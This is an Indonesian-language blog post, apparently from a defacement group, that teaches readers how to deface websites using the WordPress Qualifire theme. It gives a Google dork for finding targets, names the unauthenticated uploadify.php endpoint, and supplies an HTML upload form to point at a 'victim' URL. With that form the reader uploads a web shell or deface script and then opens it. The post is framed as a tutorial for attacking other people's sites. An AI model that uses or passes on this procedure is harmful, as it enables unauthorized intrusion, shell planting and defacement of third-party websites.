News Ticker

Deface Wordpress Themes Qualifire

By Berandal - Thursday, January 19, 2017 2 Comments






Yoo, fans :* Berandal here :D
Kali ini gw mau share Tutorial Deface WordPress Themes Qualifire :D
Caranya?? Simak di bawah :*

Alat dan Bahan :
1. Shell
2. Script Deface
3. CSRF
4. Koneksi Internet :v
5. Kopi + Rokok :p


Okee, simak aja tutorialnya :D

 1. Dorking ke google.

     Dork : inurl:/wp-content/themes/qualifire

     Kembangin dork biar dapet yg perawan :p


2. Pilih salah satu target.

3. Masukkan exploit

    Exploit: /wp-content/themes/qualifire/scripts/admin/uploadify/uploadify.php

    Vuln? Blank

4. Copy script CSRF di bawah ini, lalu paste di Notepad. Simpan dengan sxtensi .html (contoh:csrf.html).
    <form action="target" method="post" enctype="multipart/form-data">
    <label for="file">Filename:</label>
    <input type="file" name="Filedata" ><br>
    <input type="submit" name="submit" value="Submit">
    </form>

5. Jangan lupa ganti "target" dengan url korban kalian :)

6. Buka CSRF.

7.  Upload file yg ingin kalian upload. Bisa shell atau script deface.

Akses file?
http://site.co.li/namafile (contoh: http://target.com/berandal.php)

Ini ada video DEMO dari gw, tapi di video ini gw cuman upload gambar :)



Okee, selesai :D
Sekian dulu tutorial gw kali ini, See u gaess :*

Regards,
Berandal, [OWL SQUAD]


POPULAR ARTICLES :


2 comments to ''Deface Wordpress Themes Qualifire"

ADD COMMENT